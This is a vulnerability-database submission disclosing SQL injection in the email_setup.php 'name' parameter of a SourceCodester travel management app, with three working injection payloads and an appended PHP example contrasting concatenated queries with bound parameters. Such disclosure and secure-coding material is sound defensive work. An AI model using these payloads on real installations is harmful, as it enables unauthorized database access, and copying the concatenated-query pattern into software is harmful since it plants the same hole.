Submit #249801: SourceCodester SourceCodester Online Tours & Travels Management System 1.0 SQL injection

Title: SourceCodester SourceCodester Online Tours & Travels Management System 1.0 SQL injection
Description: SourceCodester Online Tours & Travels Management System email_setup.php SQL injection

Url: admin/email_setup.php

Abstract: Line 37 of email_setup.php invokes a SQL query built using unvalidated input. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.

Explanation: SQL injection errors occur when:
  Data enters a program from an untrusted source.
  The data is used to dynamically construct a SQL query.
In this case the data is passed to prepare() in email_setup.php at line 37.

Parameter: name (POST)

Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: name=Mayuri K.' RLIKE (SELECT (CASE WHEN (6196=6196) THEN 0x4d6179757269204b2e ELSE 0x28 END)) AND 'uWJN'='uWJN&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update=

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: name=Mayuri K.' AND EXTRACTVALUE(6478,CONCAT(0x5c,0x71706a7671,(SELECT (ELT(6478=6478,1))),0x717a6b6a71)) AND 'UqZk'='UqZk&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update=

Type: time-based blind
Title: MySQL >= 5.0.12 RLIKE time-based blind
Payload: name=Mayuri K.' RLIKE SLEEP(5) AND 'beie'='beie&mail_driver_host=mail.gmail.com&mail_port=587&[email protected]&mail_password=programmers324&update=

Download Code: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
Source: https://blog.csdn.net/xitanging/article/details/134903112
User: zhouwenjie1221 (UID 59880)
Submission: 12/09/2023 17:10 (3 years ago)
Moderation: 12/13/2023 10:23 (4 days later)
Status: Accepted
VulDB entry: 247895 [SourceCodester Online Tours & Travels Management System 1.0 email_setup.php prepare Name sql injection]
Points: 20
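
The explanation notes that the untrusted value reaches prepare(); calling prepare() does not help when the value is already part of the SQL text. The following is an added example, not the application's code or part of the submission, contrasting that pattern with a bound parameter. The table and column names, the helper function names, the use of PDO, and the in-memory SQLite database standing in for MySQL are all assumptions.

```php
<?php
// Added example: schema and helper names are hypothetical, not the project's.
// In-memory SQLite (pdo_sqlite) stands in for the application's MySQL database.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE email_setup (id INTEGER PRIMARY KEY, name TEXT, mail_port TEXT)");
    $db->exec("INSERT INTO email_setup VALUES (1, 'Mayuri K.', '587')");
    return $db;
}

// Vulnerable pattern: the POST value is concatenated into the SQL text before
// prepare() sees it, so prepare() compiles whatever the client supplied.
function update_name_concat(PDO $db, string $name): void {
    $stmt = $db->prepare("UPDATE email_setup SET name = '" . $name . "' WHERE id = 1");
    $stmt->execute();
}

// Hardened pattern: the SQL text is constant and the value is a bound parameter,
// so it can only ever be treated as data for the name column.
function update_name_bound(PDO $db, string $name): void {
    $stmt = $db->prepare("UPDATE email_setup SET name = :name WHERE id = 1");
    $stmt->execute([':name' => $name]);
}

// Return the single settings row so both outcomes can be compared.
function settings_row(PDO $db): array {
    return $db->query("SELECT name, mail_port FROM email_setup WHERE id = 1")
              ->fetch(PDO::FETCH_ASSOC);
}

// Constructed input: closes the string literal and adds a second assignment.
$input = "x', mail_port = '0";

// Concatenated: the statement's meaning changes and mail_port is overwritten.
$db = make_db();
update_name_concat($db, $input);
print_r(settings_row($db));

// Bound: the whole input is stored verbatim in name; mail_port is untouched.
$db = make_db();
update_name_bound($db, $input);
print_r(settings_row($db));
```

With the bound form, input validation on the field (length, allowed characters) is still worthwhile, but it is no longer what keeps the query's structure fixed.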
